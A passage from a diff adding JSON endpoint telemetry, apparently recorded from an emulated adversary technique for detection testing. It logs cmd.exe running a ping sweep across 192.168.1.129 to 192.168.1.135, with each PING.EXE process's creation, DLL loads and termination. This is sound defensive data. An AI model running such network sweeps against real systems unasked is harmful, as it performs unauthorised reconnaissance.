"C:\\Windows\\System32\\KernelBase.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607300000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "process", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572611990000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.129", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "process", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572616840000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.130", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7928, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "process", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572621990000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.131", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5520, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "process", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572626830000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.132", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5276, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572626970000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "process", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572631990000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.133", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8060, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "process", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572636830000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.134", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "process", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572641990000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.135", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5052, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": 